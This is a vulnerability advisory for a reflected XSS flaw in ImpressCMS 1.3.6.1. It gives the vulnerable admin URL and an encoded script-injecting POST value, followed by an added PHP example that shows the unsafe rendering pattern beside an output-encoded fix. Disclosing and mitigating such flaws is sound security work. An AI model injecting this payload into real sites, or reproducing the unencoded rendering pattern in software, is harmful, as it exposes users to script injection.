# Exploit Title: ImpressCMS 1.3.6.1 Reflected XSS
# Date: 05/28/2014
# Author: Mustafa ALTINKAYNAK
# Download URL : http://www.impresscms.org
# Software Link: http://www.impresscms.org/content.php?page=Download
# Vuln Category: CWE-79 (XSS)
# Tested on: ImpressCMS 1.3.6.1
# Tested Local Platform : XAMP on Windows 8
# Patch/ Fix: Not published.

---------------------------
Technical Details
---------------------------
http://www.target.com/modules/system/admin.php?fct=images&op=listimg&imgcat_id=1

POST {query=%22%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E}

---------------------------
Mustafa ALTINKAYNAK
twitter : @m_altinkaynak
www.mustafaaltinkaynak.com
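
Since no fix is published, the mitigation has to be applied where the `query` value is written back into the page. The following is an added example, not code from ImpressCMS or from the advisory author: it runs the POST value from Technical Details through a hypothetical form renderer, once unencoded and once with output encoding. The function names and the form markup are assumptions, as is the double-quoted attribute context, which the leading `">` of the value suggests.

```php
<?php
// Added example: hypothetical rendering code, not taken from ImpressCMS.

// Encode a value for use inside a quoted HTML attribute or element body.
function encode_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern: request data is concatenated into markup as-is.
function render_search_unsafe(string $query): string
{
    return '<input type="text" name="query" value="' . $query . '">';
}

// Hardened pattern: the same markup, with the value encoded at output time.
function render_search_safe(string $query): string
{
    return '<input type="text" name="query" value="' . encode_html($query) . '">';
}

// True when the rendered markup contains a script element opened by the input.
function has_live_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Sample input: the POST value from the advisory, URL-decoded the way PHP
// decodes a form body before it reaches $_POST['query'].
$query = urldecode('%22%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E');

$unsafe = render_search_unsafe($query);
$safe   = render_search_safe($query);

printf("unencoded output has live script: %s\n", var_export(has_live_script($unsafe), true));
printf("encoded output has live script:   %s\n", var_export(has_live_script($safe), true));

// Encoding is lossless: the browser shows the submitted text back to the user,
// so the search box still works for input that contains quotes or brackets.
$round_trip = html_entity_decode(encode_html($query), ENT_QUOTES, 'UTF-8');
printf("value preserved after encoding:   %s\n", var_export($round_trip === $query, true));

echo $safe, PHP_EOL;
```

Encoding belongs at the point of output rather than at input, so the stored or forwarded value stays intact and each sink (attribute, element body, JavaScript, URL) gets the encoding its context needs.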